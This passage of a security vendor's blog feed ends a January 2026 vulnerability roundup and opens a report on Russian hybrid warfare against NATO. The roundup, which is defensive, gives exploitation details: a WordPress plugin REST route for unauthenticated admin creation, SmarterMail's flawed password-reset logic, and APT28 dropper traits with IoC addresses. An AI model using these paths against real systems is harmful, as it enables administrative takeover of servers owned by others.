              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1d8e4dc50a83f9e11b1c9b0b7e1e5476bd9fb3016.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="779" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2026-21509 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <div></div>
        <h3>CVE-2026-23760 | SmarterTools SmarterMail</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added January 26, 2026</p>
        <p><strong>Why this matters:</strong> Unauthenticated attackers can reset system administrator passwords without any credentials or prior access, enabling complete administrative takeover and potential RCE through volume mount command injection.</p>
        <p><strong>Affected versions:</strong> SmarterTools SmarterMail prior to build 9511</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Upgrade to build 9511 or later immediately</li>
          <li>Review administrator account activity logs for unauthorized password resets</li>
          <li>Check Volume Mounts configuration for suspicious command entries (this one IS correct for SmarterMail)</li>
          <li>Review administrator access patterns and session logs</li>
          <li>Audit system for unauthorized changes made with compromised admin access</li>
        </ul>
        <div></div>
        <h3>CVE-2026-1281 &amp; CVE-2026-1340 | Ivanti Endpoint Manager Mobile</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: CVE-2026-1281 added January 29, 2026</p>
        <p><strong>Why this matters:</strong> Pre-authentication RCE vulnerabilities in EPMM enable unauthenticated attackers to execute arbitrary code by exploiting Apache RewriteMap helper scripts that pass attacker-controlled strings to Bash.</p>
        <p><strong>Affected versions:</strong> Ivanti EPMM 12.5.0.0 and earlier, 12.5.1.0 and earlier, 12.6.0.0 and earlier, 12.6.1.0 and earlier, and 12.7.0.0 and earlier</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Install temporary fixes via RPM packages: EPMM_RPM_12.x.0 - Security Update - 1761642-1.0.0S-5.noarch.rpm and EPMM_RPM_12.x.1 - Security Update - 1761642-1.0.0L-5.noarch.rpm</li>
          <li>Plan migration to EPMM 12.8.0.0 (scheduled for Q1 2026 release)</li>
          <li>Monitor for unusual Apache RewriteMap activity</li>
          <li>Review logs for crafted HTTP parameters to app store retrieval routes</li>
          <li>Check for unauthorized code execution attempts via RewriteRule handling</li>
        </ul>
        <p><strong>Exposure:</strong> EPMM instances accessible over corporate networks or VPN connections</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_13dd09f2863edb79f18c40c52cdf0379e47eecaf5.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="790" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Risk Rules History from</em> <em><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2026-1340 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Technical Deep Dive: Exploitation Analysis</h2>
        <h3>APT28's Operation Neusploit (CVE-2026-21509)</h3>
        <p><strong>The multi-stage attack chain:</strong> CVE-2026-21509 enables bypass of Office OLE mitigations through weaponized RTF files:</p>
        <ul>
          <li><strong>Initial delivery</strong> <strong>–</strong> Specially-crafted RTF file exploits CVE-2026-21509</li>
          <li><strong>Server-side evasion</strong> <strong>–</strong> Malicious DLL returned only for requests from targeted geographies with an expected HTTP User-Agent</li>
          <li><strong>Dropper variants</strong> <strong>–</strong> Two distinct infection paths deployed based on targeting:
            <ul>
              <li><strong>Variant 1 (MiniDoor):</strong> Writes VBA project to Outlook, modifies registry settings to enable macro execution, forwards emails to hardcoded recipient addresses</li>
              <li><strong>Variant 2 (PixyNetLoader):</strong> Creates mutex asagdugughi41, decrypts embedded payloads using rolling XOR key, establishes persistence via COM hijacking</li>
            </ul>
          </li>
        </ul>
        <p><strong>Why this matters:</strong> APT28 demonstrates sophisticated exploitation combining zero-day vulnerabilities with anti-analysis techniques, targeting government and business users for email collection and persistent access.</p>
        <div></div>
        <h3>Modular DS WordPress Plugin Exploitation (CVE-2026-23550 &amp; CVE-2026-23800)</h3>
        <p><strong>The authentication bypass chain:</strong> CVE-2026-23550 enables administrator-level access without authentication:</p>
        <ul>
          <li>Plugin treats requests as trusted based on request-supplied indicators rather than cryptographic verification</li>
          <li>/api/modular-connector/login flow grants access based on site connector enrollment state</li>
          <li>If no user identifier is supplied, the code selects an existing administrative user and establishes a privileged session</li>
          <li>CVE-2026-23800 represents the second exploitation path via REST API user creation: /?rest_route=/wp/v2/users&amp;origin=mo&amp;type=x</li>
        </ul>
        <p><strong>Known IoCs associated with CVE-2026-23550:</strong></p>
        <ul>
          <li>45[.]11[.]89[.]19</li>
          <li>185[.]196[.]0[.]11</li>
          <li>64[.]188[.]91[.]37</li>
        </ul>
        <p><strong>Known IoCs associated with CVE-2026-23800:</strong></p>
        <ul>
          <li>62[.]60[.]131[.]161</li>
          <li>185[.]102[.]115[.]27</li>
          <li>backup[@]wordpress[.]com</li>
          <li>backup1[@]wordpress[.]com</li>
        </ul>
        <p><strong>Why this matters:</strong> WordPress plugin vulnerabilities enable threat actors to compromise multiple sites from a single centralized management platform, amplifying attack impact.</p>
        <div></div>
        <h3>SmarterMail Authentication Bypass (CVE-2026-23760)</h3>
        <p><strong>The password reset flaw:</strong> CVE-2026-23760 exposes privileged password reset to anonymous callers:</p>
        <ul>
          <li>ForceResetPassword controller attribute explicitly permits unauthenticated access</li>
          <li>Backend ForcePasswordReset routine branches on client-supplied IsSysAdmin boolean rather than deriving account type from server-side context</li>
          <li>System administrator branch performs basic checks, then sets Password directly from the supplied NewPassword</li>
          <li>Logic fails to validate OldPassword, lacks an authenticated session requirement, and omits authorization controls</li>
        </ul>
        <p><strong>Why this matters:</strong> Complete administrative takeover without credentials enables threat actors to deploy web shells, modify configurations, and establish persistent access to mail server infrastructure.</p>
        <h2>Detection &amp; Remediation Resources</h2>
        <h3>Nuclei Templates from Insikt Group®</h3>
        <p>Recorded Future customers can access Nuclei templates for:</p>
        <ul>
          <li><strong>CVE-2025-8110 (Gogs) -</strong> Version detection and fingerprinting check</li>
          <li><strong>CVE-2026-23760 (SmarterMail) -</strong> Authentication bypass validation</li>
        </ul>
        <h3>Recorded Future Product Integrations</h3>
        <ul>
          <li><strong><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></strong> – Prioritize based on active exploitation data, including APT28 targeting</li>
          <li><strong><a href="https://www.recordedfuture.com/products/attack-surface-intelligence">Attack Surface Intelligence</a></strong> – Discover exposed SmarterMail, Ivanti EPMM, and Modular DS assets</li>
          <li><strong><a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Intelligence</a></strong> – Monitor vendor vulnerabilities across your supply chain</li>
        </ul>
        <h2>January 2026 Summary</h2>
        <p><strong>State-sponsored zero-days return.</strong> APT28's exploitation of CVE-2026-21509 demonstrates continued Russian interest in email collection and persistent access through Office vulnerabilities.</p>
        <p><strong>Authentication bypass dominates enterprise risk.</strong> Multiple critical flaws in SmarterMail, Modular DS, and Cisco products enable complete administrative takeover without credentials.</p>
        <p><strong>Legacy vulnerabilities persist.</strong> CVE-2009-0556 (Microsoft Office) highlights how threat actors continue targeting unretired systems where patching has lagged for over a decade.</p>
        <h2>Take Action</h2>
        <p>Ready to see how Recorded Future can help your team detect state-sponsored exploitation, prioritize authentication bypass fixes, and reduce enterprise attack surface? Explore our <a href="https://www.recordedfuture.com/demo">demo center</a> for live examples, or dive deeper with <a href="https://www.recordedfuture.com/research">Insikt Group research</a> for technical threat intelligence.</p>
        <p><strong>About Insikt Group®:</strong></p>
        <p>Recorded Future's Insikt Group® is a team of elite analysts, linguists, and security researchers providing actionable intelligence to protect organizations worldwide. Our research combines human expertise with AI-powered analytics to deliver timely, relevant threat intelligence on emerging vulnerabilities and threat actor campaigns.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Preparing for Russia’s New Generation Warfare in Europe]]></title>
            <link>https://www.recordedfuture.com/research/preparing-for-russias-new-generation-warfare-in-europe</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/preparing-for-russias-new-generation-warfare-in-europe</guid>
            <pubDate>Tue, 24 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Russia is escalating its hybrid warfare against NATO into a coordinated, full-scale campaign blending cyber attacks, sabotage, and influence operations. Read the full report to understand what New Generation Warfare means for your organization.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Since its full-scale invasion of Ukraine in February 2022, Russia has waged what we assess is largely opportunistic, though increasingly aggressive, hybrid warfare in NATO territory. Moscow has very likely not yet leveraged its full capability to integrate cyber, political, and sabotage tools into a full-scale campaign.</p>
        <p>Over the next two years, Russian President Vladimir Putin will likely escalate Russia’s hybrid warfare campaign against NATO members into a full-fledged campaign likely consistent with a Russian military doctrine called New Generation Warfare (NGW). Putin will likely use this campaign to degrade NATO political unity and defense capabilities, reinforce Russia’s network of overt and covert assets across NATO, and optimize the physical and political environment, should Putin decide to launch a military incursion into NATO territory.</p>
        <p>In a full-scale NGW campaign in NATO territory, Russia would likely move from its current pattern of influence operations efforts combined with largely opportunistic cyber and sabotage targeting to a Europe-wide campaign that is more intentionally planned and aims to project Russian power and weaken European defenses on a systemic level. An NGW campaign would very likely involve Russia using the same tactics it is currently using, including sabotage operations, influence operations, territorial waters and airspace violations, and exploitation of some NATO states’ dependence on Russian oil and gas. The primary differences between Russia’s current operations in Europe and an NGW campaign would include greater geographic breadth of those operations; greater frequency of operations; and Russia likely using tactics simultaneously and in coordinated ways. For example, likely Russia-directed threat actors might use a drone to violate the airspace over a NATO state’s airport, forcing the temporary closure of that airport, coupled with a distributed denial-of-service attack on the airport’s internal communications system. Russia might then post a video of the incidents through one of its overt or covert propaganda outlets, arguing that they show NATO cannot adequately protect its aviation network.</p>
        <p>An NGW campaign in NATO territory would very likely have significant implications for private and public sector entities, including degradation of critical infrastructure, reputational risk for individuals and companies named in Russian influence operation campaigns, and reduced public confidence in the government’s ability to ensure their safety.</p>
        <p>Over the next three to five years, Putin will likely evaluate the feasibility of moving from an NGW-like campaign in Europe to a kinetic military incursion. Factors Putin would likely weigh when making such a decision include NATO military capabilities, the likelihood that the US would defend a NATO state if it were attacked, and Russian military capabilities. However, even if the necessary conditions for such an operation emerge, the probability of a proactive Russian military operation into NATO territory very likely remains low.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Russia’s hybrid warfare campaign in NATO territory between February 2022 and January 2026 has been increasingly aggressive, but likely opportunistic and not reflective of Russia’s full cyber, influence operations, and sabotage capabilities.</li>
          <li>Putin likely views the next two years as an opportunity to test NATO’s defensive capabilities and prepare the physical and psychological environment, should he decide to launch a military incursion. Putin likely assesses that the 2028 US presidential election could lead to a US president more willing to commit US resources to NATO. As such, Putin likely views the next two years as an opportunity to exploit existing US-NATO tensions to weaken NATO’s unity and ability to defend itself.</li>
          <li>Russia’s escalated aggression against NATO over the next two years is likely to have the hallmarks of a Russian military doctrine called New Generation Warfare (NGW), which combines sabotage operations, cyberattacks, influence operations, and other non-military actions to undermine the enemy’s confidence and prepare the physical and psychological environment, should Russia elect to escalate into a kinetic military campaign.</li>
          <li>A full-scale NGW campaign would likely involve an intensified campaign of tactics Russia has used against NATO in the last few years, including sabotage operations, influence operations, violations of NATO airspace with drones and jets, violations of NATO states’ territorial waters, targeting of undersea cables, and exploitation of some NATO states’ dependence on Russian gas and oil. Russia would likely deploy these tactics more frequently, across more states simultaneously, and would likely use tactics simultaneously in an attempt to strain NATO resources.</li>
          <li>A full-scale NGW campaign would have significant implications for private and public sector entities operating in NATO territory, including disruption to critical services, reputational risk for individuals and firms named in influence campaigns, supply chain disruptions, and reduced public trust in the government’s ability to safeguard critical infrastructure. The fact that most of the critical infrastructure in NATO territory is privately owned means public-private partnerships will be essential in mitigating the impact of escalated Russian aggression.</li>
        </ul>
        <h2>Russia Likely to Escalate into New Generation Warfare Campaign in Europe Over Next Two Years</h2>
        <p>Since Russia’s full-scale invasion of Ukraine in February 2022, it has waged what Insikt Group assesses is largely opportunistic, though increasingly aggressive, hybrid warfare in Europe. These actions, though destructive, have very likely not leveraged Russia’s full capability to integrate cyber, political, and sabotage tools into a full-scale campaign.</p>
        <p>Nonetheless, Russian president Vladimir Putin very likely still prioritizes weakening European unity and defensive capabilities in service to his overarching foreign policy goal of <a href="https://mid.ru/en/foreign_policy/fundamental_documents/1860586/">replacing</a> the US-led international system with a multipolar world in which Russia, the US, and China are relatively equal in terms of geopolitical influence. Putin very likely judges that <a href="https://www.whitehouse.gov/wp-content/uploads/2025/12/2025-National-Security-Strategy.pdf">uneven</a> US assistance to European defensive efforts creates a window of opportunity for Russia to weaken Europe’s ability to resist Russian aggression. Putin likely views recent US-NATO tensions, such as the US’s articulated <a href="https://time.com/7354005/trump-davos-speech-greenland/">intention</a> to control Greenland, as an opportunity to exacerbate the strategic distance between the US and NATO, thereby weakening the transatlantic partnership that has formed the core of the US-led, post-World War II security architecture. Putin also likely views the next two years as an opportunity to optimize the physical and informational environment in Europe, should he decide to launch a kinetic military attack against Europe.</p>
        <p>Putin very likely views this window of opportunity as finite. He likely recognizes that the 2028 US presidential election could result in a US president more willing to commit US military and political resources to amplifying Europe’s defensive capabilities. As such, over the next two years, Putin will likely escalate Russia’s hybrid warfare against Europe into an expanded campaign that is likely consistent with the principles of Russian New Generation Warfare (NGW) –– a warfare doctrine <a href="https://www.armyupress.army.mil/portals/7/military-review/archives/english/militaryreview_20160228_art008.pdf">espoused</a> by senior Russian military officials emphasizing control of the information and psychological spaces, as well as the use of undeclared special forces, to weaken an enemy prior to using traditional military forces.</p>
        <p>Europe’s efforts to bolster its defenses against current levels of Russian hybrid warfare likely reinforce Putin’s perception that Europe is motivated to weaken Russia, thereby likely making him more motivated to target Europe. Putin’s perception that Europe’s defensive efforts are actually a threat to Russia is likely rooted in his calculus that NATO is fundamentally an anti-Russia bloc. Putin has substantiated this assessment by pointing to actions such as NATO’s expansion to include former Warsaw Pact countries and its decision to install missile defense systems in Poland.<sup>1</sup></p>
        <h2>New Generation Warfare Origins and Principles</h2>
        <p>Insikt Group assesses that much of Russia’s aggressive foreign policy actions since the annexation of Crimea in March 2014 –– which marked the beginning of Putin’s more assertive efforts to push back against perceived Western efforts to weaken Russia –– have been consistent with NGW, a Russian doctrine in which the state aims to bring about political change in another country primarily by using overt and covert influence tools, as opposed to conventional military force. These tools can include influence operations, sabotage operations, and exploiting economic leverage.</p>
        <p>New Generation Warfare is typically associated with Chief of the General Staff Valery Gerasimov’s 2013 <a href="https://www.armyupress.army.mil/portals/7/military-review/archives/english/militaryreview_20160228_art008.pdf">article</a> in the Russian journal <em>Military-Industrial Kurier</em>, though NGW is essentially a modern version of Soviet active measures. “Active measures” (<em>aktivnye meropriyatiya</em>) was a term <a href="https://www.marshallcenter.org/en/publications/security-insights/active-measures-russias-covert-geopolitical-operations-0">used</a> by the Soviet Union from the 1950s onwards to describe covert influence and subversion operations, including establishing front organizations, backing pro-Soviet political movements abroad, and attempting to orchestrate regime change in foreign countries. Active measures declined during the 1980s and 1990s, but Putin revived its use in the early 2000s. Indeed, in 2007, retired major-general Alexander Vladimirov alluded to that revival when he stated that “modern wars are waged on the level of consciousness and ideas” and that “modern humanity exists in a state of permanent war” in which it is “eternally oscillating between phases of actual armed struggle and constant preparation for it.”<sup>2</sup></p>
        <p>Despite the long history of Russia using active measures, Gerasimov’s 2013 article provides the most comprehensive account of how current Russian military leaders likely view this doctrine. Gerasimov’s article suggests that he views NGW both as the reality of modern warfare and as a preferred way of weakening enemies. Gerasimov argued that the Arab Spring demonstrated that modern wars are not declared conflicts between traditional militaries, but instead depend more on a combination of declared military force and tactics such as domination of the information space, targeting of critical enemy facilities, “asymmetric and indirect operations,” and the use of unofficial special forces. He argued that “the very ‘rules of war’ have changed. The role of nonmilitary means of achieving political and strategic goals has grown and, in many cases, they have exceeded the power of force of weapons in their effectiveness.”</p>
        <p>The following table, taken from a translation of the article, shows Gerasimov’s view of traditional warfare as opposed to New Generation Warfare:</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a2e8f66cd46382f09a2845436e016ce2d9e46822.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="852" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>New Generation Warfare and traditional warfare forms and methods (Source:</em> <em><a href="https://www.armyupress.army.mil/portals/7/military-review/archives/english/militaryreview_20160228_art008.pdf">Military Review</a>)</em></div>
          </div>
        </div>
        <p>We assess that Russia’s campaign in Ukraine, starting with the annexation of Crimea in March 2014 and extending to its ongoing full-scale military operation, bears many of the hallmarks of NGW. Russia’s military operations more closely aligned with NGW principles from 2014 through 2021; after Russia’s full-scale invasion of Ukraine in February 2022, the Russian military transitioned to more traditional operations. Russia’s exploitation of influence operations and asymmetric warfare has been a feature of its operations since 2014, and since 2022, Russia has <a href="https://www.iiss.org/research-paper/2025/08/the-scale-of-russian--sabotage-operations--against-europes-critical--infrastructure/">expanded</a> asymmetric and sabotage operations in Europe likely as part of a multi-faceted strategy to use power exertion in Ukraine and Europe to weaken the Western geopolitical system.</p>
        <p>This does not mean that Russian military leadership have consciously used NGW as their guiding principle in Ukraine at all times; indeed, we lack the insight into Russian military leadership thinking to assess with high confidence the principles they are employing. Rather, the combination of Gerasimov’s writings and observation of Russian operations in Ukraine means we can assess with medium confidence that Russia’s Ukraine operations prior to 2022 often reflected NGW principles. As such, we assess that NGW is a useful framework for understanding Russian military operations.</p>
        <div>
          <div>
            <div><strong>NGW Principle</strong></div>
            <div><strong>Example of How the Ukraine Operation Exemplifies Principle</strong></div>
          </div>
          <div>
            <div>Initiation of military operations by groupings of line units in peacetime</div>
            <div><strong>March 2014–February 2022:</strong> Russian regular line units (Russian Airborne Forces [VDV], Naval Infantry, and Main Intelligence Directorate [GRU]-controlled <a href="https://www.osce.org/sites/default/files/f/documents/d/1/220141.pdf">unit</a> formations) entered Ukrainian territory, <a href="https://digitallibrary.un.org/record/767883">annexed</a> Crimea, and <a href="https://www.osce.org/sites/default/files/f/documents/5/d/196991.pdf">operated</a> in eastern Ukraine without a declared state of war. In eastern Ukraine, troops operated under attempted deniability, with Moscow claiming the operations were being <a href="https://www.osce.org/sites/default/files/f/documents/1/f/146341.pdf">conducted</a> by sympathetic Ukrainian separatist forces.<br /><br /><strong>February 2022–January 2026:</strong> Though Russia acknowledged its presence throughout Ukraine, it still operates<sup>3</sup> without a full declaration of war, instead casting its campaign as a “special military operation.”</div>
          </div>
          <div>
            <div>Highly maneuverable, noncontact combat operations of interbranch groupings of line units</div>
            <div><strong>March 2014–February 2022:</strong> Russian battalion tactical groups (BTGs) generally <a href="https://www.rusi.org/explore-our-research/publications/commentary/getting-know-russian-battalion-tactical-group">demonstrated</a> high operational mobility, integrating ground forces, artillery, electronic warfare, and intelligence, surveillance, and reconnaissance (ISR) assets.<br /><br /><strong>February 2022–January 2026:</strong> As Russia has attempted to take more territory, it has <a href="https://www.rusi.org/explore-our-research/publications/commentary/attritional-art-war-lessons-russian-war-ukraine">transitioned</a> to a greater emphasis on attritional, contact-heavy warfare.</div>
          </div>
          <div>
            <div>Reduction of the military-economic potential of the enemy state via the destruction of critically important military and civilian infrastructure</div>
            <div><strong>March 2014–January 2026:</strong> Russia has consistently <a href="https://ukraine.ohchr.org/en/Increasing-attacks-on-Ukraine-s-energy-infrastructure-place-civilians-at-risk-UN-human-rights-monitors-warn">attempted</a> to degrade Ukraine’s critical infrastructure, including through long-range strikes and cyberattacks <a href="https://www.cisa.gov/news-events/ics-alerts/ir-alert-h-16-056-01">targeting</a> power plants, transportation and logistics hubs, and defense-industrial facilities.</div>
          </div>
          <div>
            <div>Mass use of precision weaponry, special operations forces, and robotics systems</div>
            <div><strong>March 2014–January 2026:</strong> Russia has increasingly <a href="https://en.defence-ua.com">used</a> precision weapons (for example, Iskander-M ballistic missiles, Kalibr cruise missiles, Kh-101/555 air-launched cruise missiles), GRU special operations <a href="https://www.osce.org/sites/default/files/f/documents/d/1/220141.pdf">units</a> (including the 3rd Separate Spetsnaz Brigade and the 346th Independent Spetsnaz Brigade); and <a href="https://www.dia.mil/Portals/110/Documents/News/Military_Power_Publications/UAV_Book.pdf">unmanned</a> systems (such as Orlan-10, Lancet, Shahid-136 drones, and ground robots for logistics and mine-clearing operations).</div>
          </div>
          <div>
            <div>Simultaneous effects on line-units and enemy facilities throughout the enemy state’s territory</div>
            <div><strong>March 2014–January 2026:</strong> Russia has <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a">conducted</a> strikes across Ukraine, using frontline units, operational rear units, missile and ground attacks, and cyber operations.</div>
          </div>
          <div>
            <div>Warfare simultaneously in physical and information space</div>
            <div><strong>March 2014–January 2026:</strong> Russia has consistently used covert and overt means to <a href="https://stratcomcoe.org/publications/analysis-of-russias-information-campaign-against-ukraine/151">propagate</a> narratives meant to justify intervention and regime change in Ukraine. These include <a href="https://www.euvsdisinfo.eu/report/ukraine-promotes-nazism-because-it-oppresses-russians/">allegations</a> of Nazism in the Ukrainian military and government writ large; discrimination against Russians in Ukraine; and Western government efforts to foment revolution in Ukraine.</div>
          </div>
          <div>
            <div>Use of asymmetric and indirect operations</div>
            <div>
              <p><strong>March 2014–February 2022:</strong> Russia’s operations were indirect because they <a href="https://www.congress.gov/crs_external_products/IF/PDF/IF12344/IF12344.3.pdf">included</a> non-acknowledged units, private military companies, and proxy forces such as Donetsk People’s Republic (DPR) and Luhansk People’s Republic (LPR) militias.</p>
              <p><strong>February 2022–January 2026:</strong> Russia escalated its use of asymmetric and indirect operations against Europe, including <a href="https://www.gov.uk/government/news/joint-expeditionary-force-activates-uk-led-reaction-system-to-track-threats-to-undersea-infrastructure-and-monitor-russian-shadow-fleet">targeting</a> undersea cables and critical infrastructure, likely to pressure Europe and Kyiv to abandon efforts to resist Russia’s Ukraine campaign.</p>
            </div>
          </div>
          <div>
            <div>Command and control of forces and assets in a unified information space</div>
            <div><strong>March 2014–January 2026:</strong> Russia has attempted to <a href="https://www.usmcu.edu/Outreach/Marine-Corps-University-Press/MCU-Journal/JAMS-vol-14-no-2/Russias-War-in-Ukraine/">integrate</a> its C2 structures, including shared ISR, targeting data, and operational planning, across services, and has centralized strike coordination for long-range fires.<br /><br />However, limitations have been <a href="https://www.congress.gov/crs_external_products/R/PDF/R47068/R47068.1.pdf">apparent</a> in Russia’s ability to accomplish this, especially since February 2022, likely stemming from deficiencies such as poor inter-service coordination, rigid command structures, and underestimation of Ukrainian capabilities and willingness to fight.</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>New Generation Warfare principles (Source: Recorded Future)</em></p>
        <h2>New Generation Warfare Toolkit</h2>
        <p>In a full-scale New Generation Warfare campaign in Europe, Russia would likely move from its current pattern of influence operations efforts combined with largely opportunistic cyber and sabotage targeting to a Europe-wide campaign that is both proactive and reactive. It would likely involve the same tactics Russia has used against NATO states for the past few years. The difference would likely be that Russia would deploy these tactics more frequently and across a greater number of states at once. A full NGW campaign would likely also involve using some operational methods simultaneously and in ways that amplify one another.</p>
        <p>Even in a full-scale NGW campaign, Russia would very likely aim to keep destruction below the threshold that risks NATO invoking Article 5. NATO officials have not specified precisely what the Article 5 threshold is; indeed, former NATO Secretary General Jens Stoltenberg <a href="https://ccdcoe.org/library/publications/cyber-attacks-and-article-5-a-note-on-a-blurry-but-consistent-position-of-nato/">stated</a> that the grounds for invoking Article 5 “must remain purposefully vague.” However, it is likely that it would include a mass casualty event or the use of a chemical or biological weapon. The text of Article 5 <a href="https://www.nato.int/en/what-we-do/introduction-to-nato/collective-defence-and-article-5">specifies</a> that the threshold involves “an armed attack.” NATO officials <a href="https://ccdcoe.org/library/publications/cyber-attacks-and-article-5-a-note-on-a-blurry-but-consistent-position-of-nato/">said</a> in 2022 that a cyberattack could constitute grounds for invoking Article 5, though they did not specify what kind of cyberattack would qualify.</p>
        <p>Russia is likely to face few downsides during an NGW campaign, due to minimal risk of Russian casualties and the campaign’s tactical flexibility. Unlike a conventional military campaign, which risks a high level of casualties that can cause domestic public dissatisfaction, an NGW campaign very likely would involve minimal risk to Russian citizens. In addition, an NGW campaign inherently offers significant tactical flexibility, as it is not a declared campaign in which Russia needs to articulate goals to justify the campaign to the Russian public and elites. As such, Putin would likely have the option to draw down tactics that are proving less effective and increase the use of more effective tactics, without needing to justify tactical failures. This flexibility would likely allow Putin to continue at least aspects of an NGW campaign in the likely event that Europe responds to an NGW campaign with escalated efforts to counter Moscow.</p>
        <h3>Influence Operations and Propaganda</h3>
        <p>Russian “active measures” serve as a force multiplier for Moscow’s broader political warfare, integrating influence operations, propaganda, and sabotage. In Europe, these efforts aim to weaken transatlantic cohesion, erode public and political support for Ukrainian sovereignty and assistance to Kyiv, and exacerbate internal societal divisions, economic uncertainty, and other challenges. By cultivating sanctions fatigue and encouraging selective bilateral re-engagement with Russia through active measures, Moscow seeks to mitigate its international isolation and <a href="https://www.cnas.org/publications/commentary/russia-wants-a-new-world-order">undermine</a> the rules-based international order, thereby advancing a Russia-favored multipolar system <a href="https://www.csis.org/blogs/post-soviet-post/four-myths-about-russian-grand-strategy">characterized</a> by exclusive spheres of influence. Notably, these activities also include angles of domestic preservation by portraying the West as chaotic, corrupt, and immoral, and thereby discouraging the expansion of liberal democracies elsewhere, particularly from within.</p>
        <p>Since Russia’s full-scale invasion of Ukraine in 2022, Insikt Group has observed concentrated Russian influence operations targeting the domestic audiences of what Moscow likely views as Kyiv’s core European supporters: the UK, France, Germany, and Poland. Insikt Group investigations, in addition to public reporting, have previously identified multiple influence operations targeting the above-mentioned major European allies, including Doppelgänger, Operation Overload, Operation Undercut, and CopyCop. These influence operations have commonly impersonated national and pan-European media outlets to disseminate messages aligned with Kremlin propaganda, including anti-Ukraine themes and content that denigrates pro-European political figures. Elsewhere, Russian influence operations have sought to use fear and physical demonstrations to manipulate public opinion. In France, for example, Russia-linked physical intimidation very likely intended to provoke public anxiety and societal unrest <a href="https://www.bbc.com/news/world-europe-67360768">included</a> the Star of David and red hand graffiti, as well as the <a href="https://www.lemonde.fr/en/pixels/article/2024/06/03/coffins-at-the-eiffel-tower-suspicions-point-to-another-case-of-russian-interference_6673608_13.html">placement</a> of caskets near the Eiffel Tower ahead of the 2024 Paris Olympic Games. Similar efforts have also appeared elsewhere in Europe, including the <a href="https://edition.cnn.com/2024/09/13/europe/pro-russian-posters-italy-intl-scli">emergence</a> of pro-Russian billboards in Italy and the "Children of War, Alley of Angels" <a href="https://eaworldview.com/2025/02/ukraine-war-europe-facing-trump-russia/">exhibit</a> in Germany.</p>
        <p>Russian influence efforts have also leveraged illicit financing and alleged bribery to attempt to favorably reshape European politics. For example, in spring 2024, Czech authorities <a href="https://www.politico.eu/article/czech-republic-russia-influence-voice-of-europe/">attributed</a> the Voice of Europe, an organization linked to Viktor Medvedchuk, to paying politicians in several EU countries to spread anti-Ukraine messages. In September and October 2024, Moldovan police <a href="https://www.reuters.com/world/europe/moldova-says-russia-linked-network-tried-buy-votes-2024-10-04/">reported</a> that a Russia-linked network, allegedly run by fugitive oligarch Ilan Shor, channeled tens of millions of dollars to buy votes ahead of Moldova’s October 20, 2024, presidential election and EU referendum. In December 2024, Romanian prosecutors <a href="https://www.reuters.com/world/europe/romania-probes-alleged-russian-linked-campaign-financing-tiktok-2024-12-06/">conducted</a> raids and opened probes into alleged illegal campaign financing and payments to TikTok users and influencers associated with the then-annulled presidential vote. More recently, former UK Member of the European Parliament (MEP) Nathan Gill was <a href="https://www.reuters.com/world/uk/former-uk-mep-jailed-accepting-bribes-linked-russia-2025-11-21/">sentenced</a> on November 21, 2025, after pleading guilty for accepting bribes to make pro-Russian statements.</p>
        <p>Insikt Group assesses Russia’s NGW against Europe will likely consist of aggressive influence operations targeting Europe that aim to erode European unity and advance Russia’s quest for a multipolar world order. NGW will very likely continue supporting Moscow’s core objectives of eroding political and public support for Ukrainian sovereignty and assistance to Kyiv, accelerate sanctions fatigue, and exploit domestic political crises and election cycles to fracture European cohesiveness and transatlantic cooperation. Moscow will likely expand its reliance on access to third parties and intermediaries, including sympathetic socio-political organizations and fringe movements, to launder Kremlin-aligned messages into the European information environment.</p>
        <p>Across Europe, Russia will almost certainly continue to attempt to delegitimize existing democratic institutions and Europe’s information ecosystem by continuing to foster distrust in elections, mainstream media, the EU, and pro-European government figures. In a post-war environment, assuming European sanctions on Russian media enterprises are lifted, Russia will very likely attempt to reestablish its state media presence while also hardening itself to withstand future disruptions, legal restrictions, and platform or government takedowns in the event of a kinetic conflict with Europe.</p>
        <p>New Generation Warfare operations against Europe will very likely incorporate much of Russia’s current-era influence tradecraft, including social media influence via human and automated networks, media impersonation and covert media outlet brands, illicit financing and bribery, and cyber-enabled influence such as hack-and-leak narratives. Further, Insikt Group assesses Moscow will very likely continue attempting to cultivate sympathetic allies through covertly funded fringe socio-political organizations, using these entities to astroturf “grassroots” support, amplify Kremlin-aligned narratives, and catalyze or intensify domestic unrest across Europe. We assess that Russia will also adapt emerging technologies, particularly AI, to scale the production, localization, and quality of influence content, increase dissemination efficiency, and optimize targeting. Continued advances in generative AI will almost certainly improve the realism of propaganda images and fabricated reporting, forged documents and correspondence, and synthetic impersonations of public figures, including audio and video deepfakes.</p>
        <h3>Airspace Incursions by Drones and Jets</h3>
